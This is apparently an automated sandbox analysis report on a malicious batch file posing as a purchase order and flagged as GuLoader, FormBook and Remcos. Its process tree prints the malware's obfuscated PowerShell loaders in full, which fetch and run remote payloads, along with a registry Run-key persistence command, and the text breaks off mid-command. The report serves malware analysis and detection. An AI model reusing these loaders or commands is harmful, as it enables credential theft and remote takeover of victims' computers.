Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat

Overview

General Information

Sample name:PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
Analysis ID:1500456
MD5:a7cf853aab7a489baa2e3fc8e31ab25f
SHA1:b114e9292f9c733594bc058fbec8f7ed63bfc208
SHA256:5f6652b2b1984430374890d518550109bcef83b980557b985e502e70e80a7392
Tags:bat
Infos:

Detection

FormBook, GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7616 cmdline: powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7796 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7860 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7944 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7328 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 5904 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 4504 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wscript.exe (PID: 7360 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • powershell.exe (PID: 5288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 2208 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 8084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse 